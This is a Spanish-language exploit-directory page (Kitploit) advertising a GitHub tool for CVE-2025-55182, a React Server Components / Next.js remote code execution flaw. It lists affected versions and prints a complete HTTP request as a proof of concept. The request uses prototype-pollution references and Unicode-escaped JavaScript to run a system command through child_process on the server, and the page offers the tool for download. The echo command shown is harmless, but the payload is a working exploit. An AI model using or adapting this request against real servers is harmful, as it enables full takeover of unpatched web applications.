Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — CVE-2025-55182(ejecución de comandos, reverse shell, inyección de shell en memoria) | Kitploit
Herramientas/GitHubGitHub/bbd-yzz/cve-2025-55182
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubbbd-yzz/cve-2025-55182

CVE-2025-55182

CVE-2025-55182(ejecución de comandos, reverse shell, inyección de shell en memoria)

Ver Repositorio
3hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182

CVE-2025-55182

Vulnerabilidad de ejecución remota de código en React Server Components (CVE-2025-55182) y vulnerabilidad de ejecución remota de código en Next.js (CVE-2025-66478). Esta vulnerabilidad afecta principalmente a la función Server Actions de react-server-dom-webpack. Debido a la falta de validación de seguridad al analizar formularios enviados por el cliente, un atacante puede construir una solicitud de formulario maliciosa para invocar módulos integrados de Node.js, ejecutando así comandos arbitrarios del sistema en el servidor, leyendo y escribiendo archivos arbitrarios, e incluso tomando el control completo del servicio. Además, dado que Next.js versiones 15.x y 16.x dependen del paquete DOM de React en el servidor defectuoso al usar App Router, los atacantes también pueden inyectar código malicioso para ejecutar comandos de forma remota.

Versiones afectadas

root@kitploit:~
React versiones afectadas == 19.0.0
React versiones afectadas == 19.0.1
React versiones afectadas == 19.1.0
React versiones afectadas == 19.2.0
react-server-dom-webpack paquete versiones afectadas == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel paquete versiones afectadas == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack paquete versiones afectadas == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
Next.js versiones afectadas >= 14.3.0-canary.77
Next.js 15.0.0 <= versiones afectadas < 15.0.5
Next.js 15.1.0 <= versiones afectadas < 15.1.9
Next.js 15.2.0 <= versiones afectadas < 15.2.6
Next.js 15.3.0 <= versiones afectadas < 15.3.6
Next.js 15.4.0 <= versiones afectadas < 15.4.8
Next.js 15.5.0 <= versiones afectadas < 15.5.7
Next.js 16.0.0 <= versiones afectadas < 16.0.7
Dify 1.1.2 <= versiones afectadas < 1.10.1-fix.1

Capturas de la herramienta

Figura 1 Figura 2 Figura 3 Figura 4

Paquete de datos de reproducción

root@kitploit:~
POST /c9436a490867 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 1755
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Next-Action: x
Connection: close

--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"\u0074\u0072\u0079\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u002e\u006d\u0061\u0069\u006e\u004d\u006f\u0064\u0075\u006c\u0065\u002e\u0072\u0065\u0071\u0075\u0069\u0072\u0065\u0028\u0027\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u0027\u0029\u002e\u0065\u0078\u0065\u0063\u0053\u0079\u006e\u0063\u0028\u0027\u0065\u0063\u0068\u006f\u0020\u0051\u0041\u0058\u004e\u0042\u0031\u0032\u0031\u0033\u0038\u0027\u0029\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0027\u0062\u0061\u0073\u0065\u0036\u0034\u0027\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0027\u0045\u0052\u0052\u004f\u0052\u0027\u003b\u0020\u007d\u0020\u0074\u0068\u0072\u006f\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u002e\u0061\u0073\u0073\u0069\u0067\u006e\u0028\u006e\u0065\u0077\u0020\u0045\u0072\u0072\u006f\u0072\u0028\u0027\u0078\u0027\u0029\u002c\u007b\u0064\u0069\u0067\u0065\u0073\u0074\u003a\u0072\u0065\u0073\u007d\u0029\u003b","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="1"

"$@0"
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="2"

[]
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd--
Descargar herramienta